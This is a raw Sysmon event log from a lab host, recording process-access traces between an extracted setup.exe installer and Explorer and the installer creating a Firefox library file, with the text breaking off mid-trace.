13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\lgpllibs.dll2021-01-18 13:59:52.364 10341000x800000000000000014892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29